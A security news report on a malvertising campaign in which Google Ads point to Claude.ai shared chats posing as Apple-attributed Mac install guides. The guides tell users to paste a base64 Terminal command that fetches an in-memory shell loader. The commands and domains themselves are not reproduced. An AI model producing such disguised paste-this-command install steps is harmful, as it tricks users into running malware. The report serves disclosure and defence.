Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active malvertising campaign. Users searching for "Claude mac download" may come across sponsored search results that list claude.ai as the target website, but lead to instructions that install malware on their Mac. The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn. Albayrak identified a Claude.ai shared chat that presents itself as an official "Claude Code on Mac" installation guide, attributed to "Apple Support." The chat walks users through opening Terminal and pasting a command, which silently downloads and runs malware on their Mac. While attempting to verify Albayrak's findings, BleepingComputer landed on a second shared Claude chat carrying out the same attack through entirely separate infrastructure. The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing: The base64 instructions shown in the shared Claude chat download an encoded shell script from domains such as: The 'loader.sh' (served by the second link above) is another set of Gunzip-compressed shell instructions: This compressed shell script runs entirely in memory, leaving little obvious trace on disk.